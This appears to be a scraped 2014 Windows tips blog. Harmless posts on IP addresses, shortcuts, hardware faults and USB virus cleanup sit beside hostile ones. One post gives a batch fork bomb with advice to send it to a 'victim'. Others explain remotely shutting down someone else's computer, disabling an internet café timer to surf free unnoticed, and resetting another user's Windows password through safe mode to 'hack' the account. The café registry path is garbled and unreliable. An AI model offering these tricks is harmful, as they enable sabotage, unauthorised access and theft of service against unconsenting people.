Translate

Thursday, June 12, 2014

• How To Find My IP Address On A PC

  • Click the Start button, select Run
  • Type CMD and press Enter.
  • Command prompt window will open. Type ipconfig and press Enter.
  • Several lines of information will be displayed. The IP address looks like "149.72.61.234" - yours will probably have different numbers near the end.

How to renew IP Address:

  • Click the Start button, select Run
  • Type CMD and press Enter.
  • A Command prompt window will open. Type ipconfig /release and press Enter. (Note: there IS a space between ipconfig and /release)
  • Wait for the command to finish.
  • Type ipconfig /renew (Note: there is a space between ipconfig and /renew)
  • Wait about 1 minute. If successful, your IP will display and look like "149.72.61.234".
  • Type Exit to close the CMD window.

*MUST SHARE*

Wednesday, June 11, 2014

•HOW TO CREATE LOGIC BOMB VIRUS

Its Just too easy to create, just follow the below steps.
1. Open Notepad on your PC and write this Code into it.
%0|%0 or copy it from here to your Notepad
2. Then save it with a .batextension! When saving delete the .txt and input the File name and the .bat extension e.g logic.bat
3. Once anyone will do double click on this bat file, his system
will Jam and Crash.

NOTE:

Now you can send it to your Victim through Mail or from your
Flash Drive to his PC and then once he open the File, the action
will start.

SOLUTION OR PREVENTION MEASURE TO TAKE


Due to members comments asking for Solution and the Way

to Prevent this Attack, We have listed this 

2 Reliable Ways to conquer it.

1) not open any File with .bat on your PC.If you are already a victim of this Virus, 

2)Once you ON your PC,quickly Press ctrl + alt + delete key on your keyboard then Start

the Task Manager, Now click on the Processes Tab and locate
Fork.bat or anyname you Use, then put you mouse on it and
click on the End Process Button, thats all.

*MUST SHARE*

•Lock a Folder With Password Using Free Folder Protector

Download Folder Protector



How to use Folder Protector?
When you run Folder Protector for the first time, the program will ask you for a password that you want to use. Enter a password that you can remember as this will be the password to your protected folder.

Lock Folder With Password

After entering the password, the program will open a folder named SecuredFILES. This is your protected folder. You can add all your private files in this folder. This folder is located at the Desktop. After adding all your files, you may close this folder. 

Then, you can use the menu in the program to lock your folder. To lock the folder, type lock as your action. After successfully locking the folder, FolderProtector will display that the folder is locked.

Free Folder Lock

Unlocking the protected folder is easy. Just type unlock as your action. Then the program will ask you to enter your password. Upon successfully entering the password, the program will display the contents of your protected folder.

Changing the Password: Just type change as your action. The program will ask you for your current password. Upon successful entry of the current password, the program will ask for your new password and change it instantly.

Acknowledgment: This software has been made possible only through the suggestions of readers of this blog, especially Ernell Albert Galido for his idea of using a menu based interface.

Windows Compatibility: This program has been successfully tested on Windows 8, Windows 7, Windows Vista and Windows XP.

Support and Development
I will continue to develop this software further. So, your suggestions are invited. If you face any problem while using this software, you can use our support page and expect a quick reply.

*By: http://www.tweakandtrick.com/*

Tuesday, June 10, 2014

•How to shutdown someone elses computer using command prompt

 To shutdown a remote machine, you have to enter following command in command prompt on the computer your are using. 

c:\> shutdown -m \\comp_name -s 


Shutdown - This is the command u use to shutdown/restart/etc 

-m - It means remote computer. 
\\comp_name - This is the computer name which you want to shutdown 
-s - You have to enter this command (-s = Shutdown, -r = Restart, -l = Logoff, -a = Abort shutdown) 

You will need to know the 'name' of the remote computer, but you may be able to get this by looking in Network Neighborhood or My Network Places/Entire Network, or you can use 'net use' command in your command window to see the computer names in your network.


FOR LAN :


1)Open the command prompt. This may be done by clicking on the "Start" button, and selecting "Run".


2)Type in cmd and press Enter.


3)Type in shutdown -m \\computername, replacing "computername" with the name of the computer you wish to shutdown or the computer's IP address.


4)Experiment with the shutdown command's switches.



  • -r will force a restart, disabling any services or user interaction from interrupting it.
  • -c "comment" will force a comment to appear on the system being shutdown.
  • -t xx will force a timeout for "xx" seconds. For example, -t 60 would perform a shutdown after a 60-second timeout.
  • -a will abort the shutdown.
  • A full command example: shutdown -m \\myserver -r -c "This system will shutdown in 60 seconds" -t 60
5)Try another method:
  • Type shutdown -i in the run window.
  • Click the "Add" box and type the name of the computer you want to shutdown or its IP address. You can select what you want the computer to do.
  • In this mode, it's necessary to add a comment. Do so.
  • Press OK.
*MUST SHARE*


•Common Computer Problems & Solutions

I shut-down my computer but it again restart.

I see this problem face many of my friend and user.
Reason:Power supply is not OK.May be problem is power supply.
Solution: Replace the power box with new one.
========================================================================
Restart Problem:
Note: Actually there are many reason for computer restart problem.But common problem is:
Reason:
1.May be your RAM speed and motherboard speed is not matching.
2.May be your CPU cooling Fan is not OK.
3.Power Supply is not OK.
4.RAM chip problem.
Solution:
1. Try to use a RAM which speed is match with motherboard.Suppose you use a ram 1333MHz [DDR3] But your motherboard is not supported that, then you need to use a RAM which is compatible with your motherboard.
2.If your CPU cooling fan is not OK. Then Check it and replace with a expert.
3. If power supply is not OK, Then you may face this kind of problem.
4. If you find out that Problem is RAM chip then try to use a new ram to check your RAM port.
5. May be system file is missing try to restore it.
========================================================================

Windows starts very slowly

Reason:
You install many program which create a icon in task-bar and boot with start up.
Solution:
Press Start+R. In command box write msconfig. Then one dialogue box will come click onstartup. now unchecked the program which you want to prevent run with windows startup.
========================================================================
Problem: CPU on but No Display
Reason:
1.Motherboard spoiled.
2.Problem in Processor.
3.Ram Chip.
Solution:
1.Replace your motherboard.
2.Check your processor by other one if possible.
3.Check your RAM chip.If you find any problem then replace with new one.
========================================================================
*MUST SHARE*

•How To Hide Hard Disk or Disk Drive Using Command Prompt

In our computer sometimes we want to hide our personal folder or data from others like guest, friends .But if you can hide a drive that time no one can understand that you have another drive where you share your personal folder or data. And it’s look like a magic for others. I think you already know about this but those who don’t know about this you can do this simply.
 Just follow the step:



you need do this using CMD [Command Prompt].
But remember which drive you want to hide it must be NTFS [New Transfer File System] Format.

1.First Press Start+R, one dialogue box will come write here CMD.



2.Command prompt will start and write here DISKPART [It is not mendatory to use capital or small letter] Then press Enter

3.Disk part will work as DISKPART> write here list volume and press Enter.

After pressing Enter you can see a list of your disk drive and choice, which drive you want to hide
4.Then write select volume D[ D: Drive Name. I am working on D drive that's why I use D. but you must use your dive] Then you can see volume 3 [your number will be here] is selected.

Then write Remove Letter D [your drive]
A confirmation message will come like : Disk part successfully remove the drive letter or mount point And go to My computer and see. Your drive is disappear.
BACK THE DRIVE AGAIN & CHECK THE VIDEO:
Don't afraid about this you can back it again simply following this way.
Follow step 1-4 again.
Then you can see volume 3 [your number will be here] is selected.
Then write assign letter D and press Enter
A confirmation message will come like : Disk part successfully assigned the drive letter or mount point And go to My computer and see. Your drive is appear again

*MUST SHARE*

•Top 10 keyboard shortcuts everyone should know

Top 10 keyboard shortcutsUsing keyboard shortcuts can greatly increase your productivity, reduce repetitive strain, and help keep you focused. For example, highlighting text with the keyboard and pressing Ctrl + C is much faster than taking your hand from the keyboard, highlighting the text using the mouse, clicking copy from the file menu, and then putting your hand back in place on the keyboard. Below are our top 10 keyboard shortcuts we recommend everyone memorize and use.

Ctrl + C or Ctrl + Insert

Copy the highlighted text or selected item.

Ctrl + V or Shift + Insert

Paste the text or object that's in the clipboard.

Ctrl + Z and Ctrl + Y

Undo any change. For example, if you cut text, pressing this will undo it. This can also often be pressed multiple times to undo multiple changes. Pressing Ctrl + Y would redo the undo.

Ctrl + F

Open the Find in any program. This includes your Internet browser to find text on the current page.

Alt + Tab or Ctrl + Tab

Quickly switch between open programs moving forward.

Tip: Press Ctrl + Tab to switch between tabs in a program.

Tip: Adding the Shift key to Alt + Tab or Ctrl + Tab will move backwards. For example, if you are pressing Alt + Tab and pass the program you want to switch to, press Alt + Shift + Tab to move backwards to that program.

Tip: Windows Vista and 7 users can also press the Windows Key + Tab to switch through open programs in a full screenshot of the Window.

Ctrl + Back space and Ctrl + Left or Right arrow

Pressing Ctrl + Backspace will delete a full word at a time instead of a single character.

Holding down the Ctrl key while pressing the left or right arrow will move the cursor one word at a time instead of one character at a time. If you wanted to highlight one word at a time you can hold down Ctrl + Shift and then press the left or right arrow key to move one word at a time in that direction while highlighting each word.

Ctrl + S

While working on a document or other file in almost every program pressing Ctrl + S will save that file. This shortcut key should be used frequently anytime you're working on anything important.

Ctrl + Home or Ctrl + End

Move the cursor to the beginning or end of a document.

Ctrl + P

Print the page being viewed. For example, the document in Microsoft Word or the web page in your Internet browser.

Page Up, Space bar, and Page Down

Pressing either the page up or page down key will move that page one page at a time in that direction. When browsing the Internet pressing the space bar will also move the page down one page at a time. If you press Shift and the Space bar the page will go up a page at a time.

Tip: If you are using the space bar to go down one page at a time press the Shift key and space bar to go up one page at a time


*Must Share*

Sunday, June 8, 2014

•HOW TO DISABLE INTERNET CAFE TIMER | CAFE TIME HACK

Have you ever felt like internet or cyber cafes are digging dip into your pocket? Well here is good news, you can now stop worring about spending so much bucks for your web browsing at any internet cafe. This trick will enable you to hack and dissable your cafe timer thereby enjoying unlimited time of internet surfing at zero charge without getting noticed.

Lets Start:

1. From your desktop, Go to Start->Run



2. Then type ''regedit'' without the quotes and hit Enter! the registry window should open.




3. Now navigate to;


HKEY_CURRENT_USER>AppEvents>Software>Classes>Microsoft>Windows>

Current Version>Internet Settings>Policies>System

5. Then on the right pane where it says Disable Task manager, right click on it and scroll down to modify, then change the value of it to 0.

6. Now open the Task manager by pressing the keys ''CTRL+SHIFT+ESC'' ... then under the Application tab, dissable Internet Cafe's timer. (Simply right click on it and End Task)

•How to Hack Into a Computer Without an Account


1)Turn on the Computer.
2)Before it shows the Windows Logo, start repeatedly pressing the F8 key.
3)Use the up/down keys to navigate your way to "Safe Mode with Command Prompt" and press enter. (After this the screen will appear dark and will show a bunch of computer codes. Don't be afraid, this will only go on for a little while. Just make sure no one else comes in when the screen is like that).
  • Then it will go to the account/login screen
4)Notice there will be a new account called "Administrator".
5)Click on it and then you"ll go to "Safe mode Command Prompt".
6)If you know how to change a password using CMD (command prompt), then do it. If not, then type in Net User.
7)After this, it will show all the accounts on that computer. Pick which one you want to hack.
  • Let's say on that computer the accounts are named Bob, Nate, and Pat. If you pick Bob then simply type in:net user Bob *
  • After this it will tell you to type a new password
  • When you are typing, it will appear as if you aren't typing anything. Don't worry, this is for security reasons. Just make SURE that you spell it correctly.
8)Confirm the password. After you are finished it will ask you to confirm the new password.
  • After this shutdown the computer and then start it up again.
9)Find the account that you hacked and enter the new password.
10)Congrats! you have hacked a windows account! Have fun!

*Dont Forget to Share*


•How to recover permanently deleted files

Follow these steps to get back your deleted files:

1. Download “Kissass Undelete” software.
2. To start searching for the files, select the drive from the Left panel of the Windows and Click the scan button. The Scan might take up to 10 seconds.

3.When the files search has been completed, it will show you the results with the name, typ, size and the last modified date of the searched file.
4. Now you can select the file to be recovered. 

Note: Only if the data on that drive is not re-occupied (or written). That means the space which was available after the deletion is not been occupied after the deletion.

•Removing Virus Using Command Prompt


If pen drive or other hard drive is infected by virus 
Command prompt this is 
the best option.Follow the steps given below.

1)Go to the command prompt by start>all
programs>accessories>command prompt or press windows key+r and
enter cmd .
2)Go to the drive where you want to delete virus example write d: to go
to D drive .
3)type attrib -r -s -h *.* /s /d and press enter .
4)press dir /a .
5)delete all the .inf , .exe , .dll , .log extension file if they are
not your files by using dos del command .
example)
del autorun.inf
if any file is not deleting rename that file by rename command
Example) rename dst.exe ms.bak this will rename dst.exe to ms.bak
Now Your pen drive is virus free .
=================================================================================

How to remove virus using cmd ( command prompt ) ?

How to remove autorun virus using cmd  ?

Steps : 
  • Press Start or winkey ) -> Run -> cmd.
  • If you are at the root directory ( C drive ) then do the following, else give cd.. and come to the root C:\> and do the following. 
  • Type in attrib -h -r -s autorun.inf ), without brackets and press Enter.
  • Type del autorun.inf ), without brackets and press Enter.
  • Follow this for all other drives. 



How to remove Shortcut virus using cmd  ?

  These Shortcut viruses are those which converts all your data inside your pen drive or Hard disk to shortcuts, and which are recoverable.

 Just follow the below given steps to remove shortcut virus from pen drive and recover back your files.


  • Go to Start -> Run -> cmd.
  • Go to your pen drive directory.
  • Type this command: del *.lnk and press Enter.
  • Type attrib -h -r -s /s /d e:\*.*
  • And then press a gentle Enter.
          How to remove shortcut virus in Pen drives in Windows ?

Recover your files :

     You can recover your files through Winrar.

  •  Open WINRAR Application.
  •  Navigate to your Pendrive location or PC Folder location.
  •  Copy Files and Paste where you want.
  •  Format your Pendrive.
How to remove empty Folder virus using cmd  ?

  Got some Files in your pen drive but they are empty! Because of the virus in your pendrive malfunctions your drive. How to remove this empty folder virus and recover files? Follow the steps given below.




  • Start -> Run -> cmd.
  • Type this command: attrib -h -r -s /s /d x:\*.* 
  • Here the letter "x" should be replaced with the drive alphabet of your pendrive that you have inserted into the computer.
  • If your pendrive shows the drive alphabet as "J", then type  this command: attrib -h -r -s /s /d j:\*.* 
  • And then press a gentle Enter.

  • Note: 

              Do a restart, and before that don't open any drives after performing the following steps.  
    *MUST SHARE*